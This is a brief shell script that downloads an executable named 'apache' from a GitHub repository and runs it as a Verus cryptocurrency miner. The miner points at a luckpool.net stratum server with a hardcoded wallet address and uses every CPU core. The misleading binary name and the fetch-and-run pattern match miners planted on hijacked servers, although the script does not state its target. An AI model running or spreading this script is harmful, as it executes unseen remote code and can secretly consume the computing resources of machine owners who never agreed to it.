#!/bin/sh
wget https://raw.githubusercontent.com/kuyaxxx/nambang/main/apache
chmod +x apache

./apache -a verus -o stratum+tcp://ap.luckpool.net:3956 -u RKJZtNARyonv8N2GtPAo5E7sn8uHPjt2LZ.$(echo $(shuf -i 1-1000 -n 1)) -p x -t $(echo $(nproc --all))
